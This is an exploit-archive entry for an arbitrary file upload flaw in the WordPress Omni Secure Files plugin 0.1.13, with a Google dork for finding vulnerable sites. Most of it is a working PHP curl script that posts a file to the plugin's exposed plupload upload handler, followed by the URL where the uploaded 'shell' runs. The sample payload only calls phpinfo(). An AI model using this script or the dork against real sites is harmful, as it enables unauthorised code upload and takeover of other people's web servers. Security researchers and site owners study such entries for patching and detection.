id: 18478
date: 06/07/2012
title: Wordpress Omni Secure Files Plugin 0.1.13 Arbitrary File Upload
author: Sammy FORGIT
cves: 

##################################################
# Description : Wordpress Plugins - Omni Secure Files Arbitrary File Upload Vulnerability
# Version : 0.1.13
# Link : http://wordpress.org/extend/plugins/omni-secure-files/
# Plugins : http://downloads.wordpress.org/plugin/omni-secure-files.zip
# Date : 01-06-2012
# Google Dork : inurl:/wp-content/plugins/omni-secure-files/
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php
<?php

$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/omni-secure-files/plupload/examples/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
       array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.exemple.com/wordpress/wp-content/plugins/omni-secure-files/plupload/examples/uploads/lo.php

lo.php
<?php
phpinfo();
?>



#  0day.today [2023-03-27]  #